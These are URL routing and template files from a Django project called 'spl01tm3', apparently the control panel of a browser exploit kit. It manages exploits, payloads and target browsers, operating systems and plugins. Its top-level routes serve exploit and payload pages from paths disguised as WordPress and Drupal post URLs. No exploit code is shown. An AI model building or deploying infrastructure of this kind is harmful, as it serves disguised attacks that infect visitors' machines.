spl01tm3/controlpanel/urls.py
from django.conf.urls import patterns, url

from controlpanel import views

urlpatterns = patterns('',
    url(r'^set_timezone/$', views.set_timezone, name='set_timezone'),
    url(r'^threads/$', views.threads_list, name="threads"),
    url(r'^thread/(?:(?P<thread_id>\d+)/)?$', views.thread, name="thread"),
    url(r'^rule/(?:(?P<rule_id>\d+)/)?$', views.rule, name="rule"),
    url(r'^exploits/$', views.exploits_list, name="exploits"),
    url(r'^exploit/(?:(?P<exploit_id>\d+)/)?$', views.exploit, name="exploit"),
    url(r'^target/os/(?:(?P<target_os_id>\d+)/)?$', views.target_os, name="target_os"),
    url(r'^target/browser/(?:(?P<target_browser_id>\d+)/)?$', views.target_browser, name="target_browser"),
    url(r'^target/plugin/(?:(?P<target_plugin_id>\d+)/)?$', views.target_plugin, name="target_plugin"),
    url(r'^payloads/$', views.payloads_list, name="payloads"),
    url(r'^payload/(?:(?P<payload_id>\d+)/)?$', views.payload, name="payload"),
    url(r'^security/$', views.security, name="security"),
    url(r'^notifications/smtp_configuration/(?:(?P<conf_id>\d+)/)?$', views.smtp_configuration, name="smtpconf"),
    url(r'^notifications/sms_configuration/(?:(?P<conf_id>\d+)/)?$', views.sms_configuration, name="smsconf"),
    url(r'^notifications/recipient/(?:(?P<recipient_id>\d+)/)?$', views.notification_recipient, name="recipient"),
    url(r'^notifications/$', views.notifications, name="notifications"),
    url(r'^details/logs/$', views.explore_logs, name="explore_logs"),
    url(r'^details/$', views.details, name="details"),
    url(r'^icons/browser/(?P<family>[^/]+)(?:/(?P<version>[^/]+))?/$', views.browser_icon, name="browser_icon"),
    url(r'^icons/os/(?P<family>[^/]+)(?:/(?P<version>[^/]+))?/$', views.os_icon, name="os_icon"),
    # Stats tab (default)
    url(r'^$', views.stats, name='stats'),
)

spl01tm3/spl01tm3/urls.py
from django.conf.urls import patterns, include, url

from django.contrib import admin
admin.autodiscover()

urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'spl01tm3.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),

    url(r'^admin/', include(admin.site.urls)),
    url(r'^login/$', 'django.contrib.auth.views.login', name="login"),
    url(r'^logout/$', 'django.contrib.auth.views.logout_then_login', name="logout"),

    url(r'^panel/', include('controlpanel.urls', namespace="controlpanel", app_name="controlpanel")),
    url(r'^controller/', include('controller.urls', namespace="controller", app_name="controller")),

    url(r'^\d{4}/\d{2}/\d{2}/[a-zA-Z0-9\-_]*/.+$', 'landingpage.views.payload', name="payload_wordpress"),
    url(r'^(?:drupal/)?node/\d+/.+$', 'landingpage.views.payload', name="payload_drupal"),

    url(r'^\d{4}/\d{2}/\d{2}/[a-zA-Z0-9\-_]*/$', 'landingpage.views.exploit', name="exploit_wordpress"),
    url(r'^(?:drupal/)?node/\d+/$', 'landingpage.views.exploit', name="exploit_drupal"),
    #url(r'^modules.php$', 'landingpage.views.exploit', name="exploit_phpnuke"),

    url(r'^(\d+)$', 'landingpage.views.landingpage', name="landingpage"),
)

spl01tm3/templates/base.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Spl01tm3: {% block title %}{% endblock %}</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
{% block customheaders %}{% endblock %}
<link href="/static/css/bootstrap.min.css" rel="stylesheet">
<link href="/static/css/bootstrap-datetimepicker.min.css" rel="stylesheet">
<link href="/static/css/bootstrap-select.min.css" rel="stylesheet">
<link href="/static/css/dataTables.bootstrap.min.css" rel="stylesheet">
<link href="/static/css/flags32.min.css" rel="stylesheet">
<style>
body {
    margin-top: 20px;
}
.footer {
    margin-top: 45px;
    padding: 35px 0 36px;
    border-top: 1px solid #e5e5e5;
}
.footer p {
    margin-bottom: 0;
    color: #555;
}
.mono {
    font-family: monospace;
}
.signature {
    padding: 6px;
    margin-bottom: 3px;
}
img.fade {
    opacity:0.4;
    filter:alpha(opacity=40);
}
img.fade:hover {
    opacity:1.0;
    filter:alpha(opacity=100);
}
.section-title {
    border-bottom: 1px solid #eee;
    margin-bottom: 15px;
    margin-top: 20px;
    padding-bottom: 3px;
}
{% block customcss %}{% endblock %}
</style>
</head>
<body>
    <div class="container-fluid">
        {% block navbar %}{% endblock %}
        <br>
        {% block breadcrumb %}{% endblock %}
        {% block content %}{% endblock %}

        <footer class="footer">
            <div class="row">
                <div class="col-md-1 col-md-offset-11"><a href="#">Back to top</a></div>
            </div>
        </footer>
    </div>
    
    <script src="/static/js/jquery.min.js"></script>
    <script src="/static/js/jquery-ui.min.js"></script>
    <script src="/static/js/moment.min.js"></script>
    <script src="/static/js/bootstrap.min.js"></script>
    <script src="/static/js/bootstrap-datetimepicker.min.js"></script>
    <script src="/static/js/bootstrap-select.min.js"></script>
    <script src="/static/js/dataTables.min.js"></script>
    <script src="/static/js/dataTables.bootstrap.min.js"></script>
    <script src="/static/js/Chart.min.js"></script>

    <script>
    {% block bottomscripts %}{% endblock %}
    </script>
</body>
</html>

spl01tm3/templates/navbar.html
    <div class="pull-right">
        Welcome, {{ user.username }} [ <a href="{% url 'admin:index' %}">Advanced</a> ] [ <a href="{% url 'logout' %}">Logout</a> ]
    </div>
    
    <ul class="nav nav-pills" role="tablist">
      <li role="presentaion" {% if active_tab == 'stats' %} class="active"{% endif %}>
        <a href="{% if active_tab == 'stats' %}#{% else %}{% url 'controlpanel:stats' %}{% endif %}">
            <span class="glyphicon glyphicon-stats" aria-hidden="true"></span>
            Stats
        </a>
      </li>
      <li role="presentaion" {% if active_tab == 'threads' %} class="active"{% endif %}>
        <a href="{% if active_tab == 'threads' %}#{% else %}{% url 'controlpanel:threads' %}{% endif %}">
            <span class="glyphicon glyphicon-film" aria-hidden="true"></span>
            Threads
        </a>
      </li>
      <li role="presentaion" {% if active_tab == 'exploits' %} class="active"{% endif %}>
        <a href="{% if active_tab == 'exploits' %}#{% else %}{% url 'controlpanel:exploits' %}{% endif %}">
            <span class="glyphicon glyphicon-flash" aria-hidden="true"></span>
            Exploits
        </a>
      </li>
      <li role="presentaion" {% if active_tab == 'payloads' %} class="active"{% endif %}>
        <a href="{% if active_tab == 'payloads' %}#{% else %}{% url 'controlpanel:payloads' %}{% endif %}">
            <span class="glyphicon glyphicon-file" aria-hidden="true"></span>
            Payloads
        </a>
      </li>
      <li role="presentaion" {% if active_tab == 'security' %} class="active"{% endif %}>
        <a href="{% if active_tab == 'security' %}#{% else %}{% url 'controlpanel:security' %}{% endif %}">
            <span class="glyphicon glyphicon-tower" aria-hidden="true"></span>
            Security
            </a>
      </li>
      <li role="presentaion" {% if active_tab == 'notifications' %} class="active"{% endif %}>
        <a href="{% if active_tab == 'notifications' %}#{% else %}{% url 'controlpanel:notifications' %}{% endif %}">
            <span class="glyphicon glyphicon-phone-alt" aria-hidden="true"></span>
            Notifications
        </a>
      </li>
    </ul>